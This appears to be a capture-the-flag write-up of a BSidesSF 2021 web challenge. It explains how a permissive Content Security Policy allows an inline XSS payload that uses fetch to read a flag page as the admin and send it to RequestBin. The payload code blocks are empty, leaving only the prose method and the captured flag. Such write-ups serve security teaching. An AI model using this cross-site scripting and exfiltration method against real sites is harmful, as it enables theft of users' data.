Rating:
Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1) for writeup with images.
---
If we look at the Content Security Policy (CSP) for this page, we can see it's
very open. To identify this, you can learn each rule or use a tool such as [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com/).
The CSP in this case was:
```javascript
default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *
```
The unsafe-inline keyword will allow execution of arbitrary inline scripts.
Let's start with a simple XSS payload:
```html
```
This already works! So now we only need to get the flag from the
`/csp-one-flag` route after the admin visits it. We can use [fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API) for this.
We'll also use [https://requestbin.io/](https://requestbin.io/) again.
Here's the final payload submitted to the admin:
```html
```
And we get a flag back on the RequestBin side:
```
CTF{Can_Send_Payloads}
```